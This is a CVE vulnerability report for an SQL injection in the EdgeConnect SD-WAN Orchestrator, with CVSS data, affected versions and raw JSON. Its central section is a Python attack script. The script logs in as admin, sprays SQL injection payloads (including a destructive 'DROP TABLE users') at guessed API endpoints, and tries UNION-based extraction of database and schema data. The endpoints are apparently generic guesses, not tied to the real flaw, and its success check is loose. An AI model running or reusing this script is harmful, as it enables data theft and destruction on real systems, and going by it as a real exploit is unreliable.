Security Vulnerability Report
CVE-2025-37181 CVSS 7.2 HIGH

CVE-2025-37181

Published: 2026-01-14 17:16:05
Last Modified: 2026-01-20 18:17:47

Description

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

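cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* (versions 9.2.0 through 9.2.10, inclusive) - VULNERABLE
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* (versions 9.3.0 through 9.3.6, inclusive) - VULNERABLE
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* (versions 9.4.0 through 9.4.4, inclusive) - VULNERABLE
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* (versions 9.5.0 up to, but not including, 9.5.6) - VULNERABLE
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:9.6.0:*:*:*:*:*:*:* - VULNERABLE
EdgeConnect SD-WAN Orchestrator (version to be confirmed; refer to the official HPE advisory)
Contact HPE Support for the complete list of affected versions and information on fixed versions.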

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37181 SQL Injection PoC for HPE EdgeConnect SD-WAN Orchestrator
# Authentication required (high privilege account)
# Target: EdgeConnect SD-WAN Orchestrator Web Management Interface
import requests
import json
import sys
from urllib.parse import urlencode

TARGET_URL = "https://<target-ip>/orchestrator/"
USERNAME = "admin"
PASSWORD = "admin_password"


def login():
    """Authenticate to the Orchestrator and obtain session cookie"""
    login_url = f"{TARGET_URL}api/v1/auth/login"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    try:
        response = requests.post(login_url, json=data, headers=headers, verify=False, timeout=30)
        if response.status_code == 200:
            return response.cookies
        else:
            print(f"[-] Login failed: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return None


def test_sql_injection(session_cookie):
    """Test for SQL injection vulnerability in search/filter parameters"""
    # Common vulnerable endpoint patterns in SD-WAN Orchestrators
    vulnerable_endpoints = [
        "api/v1/devices/search",
        "api/v1/tunnels/filter",
        "api/v1/reports/query",
        "api/v1/config/search",
        "api/v1/users/list"
    ]
    # SQL injection payloads
    payloads = [
        "' OR '1'='1",
        "' UNION SELECT NULL--",
        "' AND SLEEP(5)--",
        "'; DROP TABLE users;--"
    ]
    for endpoint in vulnerable_endpoints:
        for payload in payloads:
            test_url = f"{TARGET_URL}{endpoint}"
            params = {"q": payload, "limit": "10"}
            try:
                response = requests.get(test_url, params=params, cookies=session_cookie, verify=False, timeout=10)
                # Check for SQL error indicators
                if any(err in response.text.lower() for err in ['sql', 'syntax', 'error', 'mysql', 'postgres', 'sqlite']):
                    print(f"[+] Potential SQL injection found at {endpoint}")
                    print(f"[+] Payload: {payload}")
                    print(f"[+] Response snippet: {response.text[:200]}")
                    return True
            except:
                continue
    return False


def extract_data(session_cookie):
    """Extract database information using SQL injection"""
    # Example: Extract database version and user info
    extract_endpoints = [
        "api/v1/reports/query",
        "api/v1/audit/logs"
    ]
    # Data extraction payloads
    extract_payloads = [
        "' UNION SELECT version(),user(),database()--",
        "' UNION SELECT table_name,column_name,data_type FROM information_schema.columns--"
    ]
    for endpoint in extract_endpoints:
        for payload in extract_payloads:
            extract_url = f"{TARGET_URL}{endpoint}"
            params = {"filter": payload}
            try:
                response = requests.get(extract_url, params=params, cookies=session_cookie, verify=False, timeout=30)
                if response.status_code == 200:
                    print(f"[*] Extracted data from {endpoint}:")
                    print(response.text[:500])
            except:
                continue


if __name__ == "__main__":
    print("[*] CVE-2025-37181 SQL Injection PoC")
    print("[*] Target: HPE EdgeConnect SD-WAN Orchestrator")
    # Step 1: Login with high-privilege account
    print("\n[1] Attempting authentication...")
    session = login()
    if not session:
        print("[-] Authentication failed. Exiting.")
        sys.exit(1)
    print("[+] Authentication successful")
    # Step 2: Test for SQL injection
    print("\n[2] Testing for SQL injection vulnerability...")
    if test_sql_injection(session):
        print("[+] SQL injection vulnerability confirmed!")
        # Step 3: Extract data (for authorized security testing only)
        print("\n[3] Attempting data extraction (authorized testing only)...")
        extract_data(session)
    else:
        print("[-] No SQL injection detected or target not vulnerable")

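References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US (Vendor Advisory)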

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37181", "sourceIdentifier": "[email protected]", "published": "2026-01-14T17:16:05.497", "lastModified": "2026-01-20T18:17:46.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation."}, {"lang": "es", "value": "Vulnerabilidades en la interfaz de gestión basada en web de EdgeConnect SD-WAN Orchestrator podrían permitir a un atacante remoto autenticado realizar ataques de inyección SQL. La explotación exitosa podría permitir a un atacante ejecutar comandos SQL arbitrarios en la base de datos subyacente, lo que podría llevar a un acceso no autorizado a datos o manipulación de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndIncluding": "9.2.10", "matchCriteriaId": "4972AD17-B8C3-4E30-B757-0B5BB830B28C"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.0", "versionEndIncluding": "9.3.6", "matchCriteriaId": "48DA7E3C-5E4C-4A91-872E-F278046A3146"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.4.0", "versionEndIncluding": "9.4.4", "matchCriteriaId": "F65E7518-5652-4651-B8B8-25C763044E7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.5.0", "versionEndExcluding": "9.5.6", "matchCriteriaId": "6C96154A-927C-4F4C-B00E-9E10340859A0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:9.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5EBF5C1-4470-40F0-9812-1729E7E42DA0"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}